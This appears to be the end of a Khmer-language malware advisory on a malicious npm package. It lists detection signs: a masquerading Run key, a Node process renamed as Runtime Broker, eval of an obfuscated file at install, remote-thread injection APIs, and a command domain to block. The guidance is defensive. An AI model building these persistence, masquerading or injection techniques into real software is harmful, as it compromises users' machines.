- ស្វែងរកតម្លៃ Run ដែលមានឈ្មោះថា OneDriveUpdate ដែលទិន្នន័យរបស់វាហៅ wscript.exe ប្រឆាំងនឹង .vbs នៅក្នុងផ្លូវសម្រាប់អ្នកប្រើប្រាស់ម្នាក់ៗ។ កម្មវិធីធ្វើបច្ចុប្បន្នភាព OneDrive ពិតប្រាកដមិនត្រូវបានចុះឈ្មោះតាមវិធីនេះទេ។
- ការជូនដំណឹងអំពីដំណើរការ Node.js ដែល process.title របស់វាគឺជា Runtime Broker។ ឈ្មួញកណ្តាលពិតប្រាកដគឺ RuntimeBroker.exe មិនមែនជា Node runtime ទេ។
- សម្គាល់ការទាញយកកញ្ចប់នៅពេលដំឡើង npm ដែលផ្ញើកម្មវិធីបន្ថែម .node ដែលបានចងក្រង បូករួមទាំង eval(fs.readFileSync(…)) នៃឯកសារ .obf.js ដែលជាបងប្អូន។ ការផ្គូផ្គងនោះ — ប្រព័ន្ធគោលពីរដើមស្រអាប់ដែលផ្ទុកនៅជាប់នឹងបន្ទុកអត្ថបទដែលមិនច្បាស់លាស់ — គឺជាការប្រាប់រចនាសម្ព័ន្ធនៅទីនេះ ដោយមិនអាស្រ័យលើ IOC ខ្សែអក្សរណាមួយ។
- ចាត់ទុកអ្នកស្តាប់ដែលចងភ្ជាប់ក្នុងមូលដ្ឋានណាមួយនៅលើច្រក 3000 ដែលបង្កើតដោយដំណើរការ Node ដែលមិននឹកស្មានដល់ថាជាជនសង្ស័យនៅលើចំណុចបញ្ចប់ Windows ដែលបានគ្រប់គ្រង។
- រារាំង ឬជូនដំណឹងលើសំណើចេញទៅ izopi.com ពីអ្នកអភិវឌ្ឍន៍ ឬម៉ាស៊ីនមេអ្នកប្រើប្រាស់ចុងក្រោយ។ វាគឺជាចំណុចបញ្ចប់ខាងក្រៅតែមួយគត់របស់កញ្ចប់ ដែលទៅដល់នៅ /check.php ពីម៉ាស៊ីនមេដែលមិនច្បាស់លាស់។
- សម្រាប់កម្មវិធីបន្ថែម .node ដែលបានភ្ជាប់មកជាមួយណាមួយ សូមពិនិត្យតារាងនាំចូលរបស់វាមុននឹងទុកចិត្តវា។ ការរួមបញ្ចូលគ្នា OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread គឺជាការចាក់ដំណើរការពីចម្ងាយ ដោយមិនគិតពីអ្វីដែលកញ្ចប់អះអាងថាធ្វើនោះទេ។ នៅទីនេះ វាស្ថិតនៅជាប់នឹងស្រទាប់ Direct3D និងខ្សែអក្សរ aimbot/ESP/triggerbot។
សម្រាប់ការវិភាគឋិតិវន្ត pipelines រូបរាងនៃការជឿជាក់គឺប្រើប្រាស់បានយូរនៅទូទាំងកំណែដែលបោះបង់ចោល៖ ទម្រង់ដំឡើងមិនមែនបណ្តាញ ការកំណត់ចំណងជើងដំណើរការទៅឈ្មោះដំណើរការប្រព័ន្ធដែលគេស្គាល់ ការសរសេរ Run-key តាមរយៈ PowerShell និងការវាយតម្លៃឯកសារដែលបានអានពីថាស។ គ្មានអ្វីមួយក្នុងចំណោមនោះអាស្រ័យលើដែន អាសយដ្ឋាន IP ឬលេខកំណែដែលការបោះពុម្ពផ្សាយឡើងវិញបន្ទាប់អាចបង្វិលចេញបានទេ។
ឯកសារយោង
[npm: ភាពរសើប] – ទំព័រចុះបញ្ជីសម្រាប់បន្ទាត់កំណែកញ្ចប់ដែលបានពិភាក្សានៅទីនេះ។ អាចនឹងមានការដកចេញ។





